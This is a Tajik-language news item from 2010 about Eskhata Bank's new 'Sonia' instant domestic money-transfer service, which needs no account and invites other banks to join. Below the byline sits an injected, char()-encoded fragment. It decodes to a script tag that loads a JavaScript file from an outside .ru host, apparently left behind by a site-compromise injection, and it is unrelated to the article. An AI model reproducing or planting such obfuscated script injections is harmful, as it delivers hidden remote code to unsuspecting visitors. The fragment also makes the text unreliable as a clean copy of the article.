18.05.2010
Интиқоли маблағҳо дар ҳудуди Ҷумҳурӣ тӯли як сония
Тавре зимни сӯҳбат ба мо мутахассиси оид ба корҳои алоқа бо ҷамеаи ҶШК «Бонки Эсхата» Кибриё Аҳмадҷонова ба мо иттилоъ дод Бонки Эсхата ба татбиқи усули нави интиқоли маблағҳоро тахти унвони «Сония» оғоз кардааст. Ин усул аз тарафи мутахассисони Бонк таҳия шудааст. Минбаъд бошандагону меҳмонони Ҷумҳурӣ метавонанд тавассути «Сония» маблағҳои худро ба ҷойи даркорӣ интиқол диҳанд, ки дар сонияхои башумор маблағҳояшон ба нуқтаи таъинот рафта мерасад.
Усули интиқоли маблағҳои «Сония» дар дохили ҷумҳурӣ бе кушодани ҳисоб ба пули миллӣ-сомонӣ амал мекунад, ки ин гуна усул ҳанӯз дар қаламрави ҷумҳурӣ вуҷуд надорад.
Алҳол ин усул дар ҳудуди Бонк пурра амал карда рӯз аз рӯз ҷуғрофияи хизматрасонии худро бо муттаҳидсозии тамоми пунктҳои интиқоли маблағ васеъ месозад.
Тарофаи паст, кафолати дастрас кардан, шартҳои сабуки интиқоли маблағ аз бартариятҳои асосии ин усул маҳсуб меёбад.
Имрӯз Бонки «Эсхата омода аст, бо дигар бонкҳо тавассути муттаҳидсозӣ онҳо ба усули интиқоли саривақтии маблағ-«Сония» ҳамкорӣ намояд.
Раёсати ҶСК «Бокни Эсхата» тамоми бонкҳоро ба ҳамкории тарафайн судманд даъват менамояд, ки он ба афзоиш ёфтани даромади бонкҳо аз маҷмӯи хизматрасониҳои интиқоли пулӣ ба мизоҷон нигароида шудааст.
Хоҳишмандон метавонад ба роҳбари лоиҳа Сайдулло Насуллоев тавассути телефони 6-69-99 муроҷиат намоянд.
М.Мақсудов

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)629d00cc5e5b85efb5870caae27db818.js" type="text/javascript">

ТАВЗЕҲОТ